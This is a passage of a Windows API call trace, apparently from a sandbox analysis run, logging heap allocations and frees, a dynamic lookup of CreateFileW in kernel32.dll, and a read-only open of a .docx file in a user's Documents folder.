0x43c9c80 [0077.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0077.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0077.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0077.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0077.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0077.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0077.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0077.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0077.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0077.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0077.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0077.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0077.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0077.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0077.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0077.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0077.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0077.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0077.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0077.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0077.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0077.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0077.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0077.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0077.772] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0077.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0077.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0077.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0077.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0077.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0077.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0077.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0077.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0077.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0077.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0077.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0077.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0077.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0077.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0077.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0077.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0077.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0077.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0077.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0077.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0077.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0077.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0077.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0077.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0077.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0077.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0077.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0077.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0077.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0077.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0077.773] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0077.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0077.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0077.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0077.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0077.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0077.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0077.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0077.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0077.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0077.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0077.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0077.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0077.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0077.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0077.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0077.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0077.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0077.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0077.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0077.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0077.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0077.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0077.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0077.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0077.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0077.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0077.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0077.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0077.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0077.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0077.775] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0077.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0077.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0077.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0077.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0077.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0077.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0077.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0077.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0077.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0077.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0077.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0077.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0077.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0077.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0077.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0077.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0077.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0077.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0077.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0077.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0077.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0077.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0077.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0077.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0077.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0077.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0077.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0077.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0077.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0077.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0077.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0077.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0077.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0077.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0077.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0077.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0077.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0077.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0077.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0077.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0077.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0077.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0077.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0077.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0077.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0077.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0077.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0077.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0077.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0077.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0077.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0077.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0077.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0077.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0077.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0077.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0077.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0077.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0077.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0077.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0077.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0077.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0077.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0077.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0077.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0077.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0077.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0077.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0077.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0077.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0077.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0077.778] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0077.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0077.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0077.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca568 [0077.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca568, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0077.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0077.779] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0077.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0077.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0077.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0077.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0077.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0077.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0077.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0077.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0077.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0077.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0077.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x43eb3a8 [0077.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0077.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0077.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0077.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0077.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0077.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0077.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0077.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0077.779] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\oZbDkszpyQazC9.docx" (normalized: "c:\\users\\fd1hvy\\documents\\ozbdkszpyqazc9.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0077.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0077.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea2e0 [0077.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0077.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0077.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0077.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0077.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0077.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0077.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0077.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0077.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0077.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0077.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0077.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0077.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0077.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0077.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eb3a8 | out: hHeap=0x1780000) returned 1 [0077.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0077.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0077.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0077.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0077.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0077.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0077.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0077.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0077.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0077.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0077.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0077.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0077.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0077.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0077.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0077.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0077.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0077.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0077.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0077.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0077.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0077.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0077.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0077.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0077.782] FreeLibrary (hLibModule=0x772d0000) returned 1 [0077.782] HeapFree (in: hHeap=0x1780000, 